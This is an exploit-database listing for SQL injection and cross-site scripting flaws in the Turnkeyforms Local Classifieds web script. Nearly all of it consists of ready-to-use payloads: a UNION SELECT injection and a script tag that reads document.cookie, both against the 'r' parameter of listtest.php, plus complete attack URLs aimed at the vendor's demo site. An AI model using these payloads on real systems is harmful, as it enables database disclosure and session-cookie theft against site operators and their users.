[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

turnkeyforms Local Classifieds (XSS/SQL) Multiple Vulnerabilities

Author
TR-ShaRk
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4110
Category
web applications
Date add
07-11-2008
Platform
unsorted
=================================================================
turnkeyforms Local Classifieds (XSS/SQL) Multiple Vulnerabilities
=================================================================


##################################################################
#
#   Author: TR-ShaRk
#
#   Script : Local Classifieds Turnkeyforms
#
######################
#
#   SQL Injection Vuln. :
#
#   listtest.php?r=-39+union+select+1,@@version--
#
#   Xss:
#
#   listtest.php?r="><script>alert(document.cookie)</script>
#
######################
#
#   Demo:
#
#
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r="><script>alert(document.cookie)</script>
# http://demo.turnkeyforms.com/localclassifieds/listtest.php?r=-39+union+select+1,@@version--
#
######################



#  0day.today [2024-11-15]  #